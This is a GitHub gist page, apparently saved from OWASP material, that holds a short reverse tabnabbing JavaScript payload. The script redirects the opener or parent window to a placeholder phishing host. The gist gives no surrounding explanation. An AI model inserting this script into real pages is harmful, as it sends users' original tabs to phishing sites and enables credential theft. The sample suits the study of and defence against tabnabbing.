Created
August 10, 2021 19:09
-
-
Save devhug/48dfd92c0077b4d8ca98f3e64a8b4fb7 to your computer and use it in GitHub Desktop.
Reverse Tabnabbing Web Attack | OWASP Foundation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script> | |
if (window.opener) window.opener.parent.location.replace('http://phishing.com'); | |
if (window.parent != window) window.parent.location.replace('http://phishing.com'); | |
</script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment